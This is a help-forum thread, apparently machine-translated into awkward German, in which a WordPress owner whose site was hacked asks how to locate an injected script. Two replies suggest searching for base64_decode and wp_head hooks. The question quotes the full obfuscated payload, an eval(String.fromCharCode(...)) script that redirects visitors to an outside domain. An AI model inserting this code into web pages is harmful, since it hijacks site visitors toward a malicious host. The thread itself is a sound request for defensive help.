So entfernen Sie schädliche eval-script nicht gefunden werden kann in header.php

Meine WordPress website gehackt wurde und ich hab nur sehen können das schädliche Skript, indem Sie die Quelle meiner index-Seite: 'view-source:mydomain.com'

Das problem ist, ich kann nicht finden, den Ort dieser code in jedem meiner WordPress-php-Dateien. Ich habe alle core-Dateien (header.php, htaccess, etc.) ohne in der Lage, es zu finden.

Der code befindet sich direkt vor dem schließenden /head-tag:

<script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32, 116, 100, 32, 61, 32, 49, 59, 32, 118, 97, 114, 32, 122, 122, 103, 32, 61, 32, 50, 59, 32, 118, 97, 114, 32, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 102, 116, 111, 117, 116, 115, 105, 100, 101, 109, 121, 112, 114, 111, 102, 105, 108, 101, 46, 105, 110, 102, 111, 47, 117, 112, 116, 121, 112, 101, 63, 122, 103, 61, 49, 38, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 99, 41, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59));</script> 

Ich weiß, dass dies eine bösartige umleiten, aber nicht wissen, wie Sie damit umgehen. Ich hatte ursprünglich das Problem durch komplett Neuinstallieren meiner website (verlieren einige Beiträge als Ergebnis), und Tat mein bestes, wie ein noob um dieses problem zu beheben, bevor diese Frage zu stellen.

Würde wirklich zu schätzen einige helfen!

2 Antworten

  • Alexandru Filipescu
    4. Mai 2019

    Es mir noch nie passiert vorher, aber wenn es mir passieren würde, würde ich download Total Commander und Suche in allen Dateien, die bösartige Skripts und auch Stück für Stück.

    Ich würde auch versuchen, löschen Sie alle Cache-Daten in Ihrem browser, und auch cookies löschen, da Sie speichern können Teile des Codes.

  • mynd
    4. Mai 2019

    Die Chancen sind hoch, dass auch die Ausgabe der <script> block codiert im Quellcode in php-Dateien, so dass Sie nicht in der Lage sein zu finden, das code-snippet von oben, sondern eher so etwas wie eine base64-codierte string in Ihre wordpress-Dateien. Wie Alexandru vorgeschlagen, Sie könnte die Suche in allen WP-Dateien-Inhalt für base64_decode und gezielt prüfen die Vorgänge. Jedoch, da es theoretisch unendlich viele Möglichkeiten, wie Maske einen string, dieser kann sich schwerfällig ganz einfach.

    Ein anderer Ansatz könnte die Suche nach dem wp_head hook (-> suchen 'add_action('wp_head', die typischerweise verwendet wird, code zu injizieren, um Ihre website ist header Abschnitt. Vielleicht findest du die Funktion, die aufgerufen wird und verantwortlich für die Injektion der obigen Ausgabe. Falls Sie vor Ort alle seltsam aussehende code, poste es hier.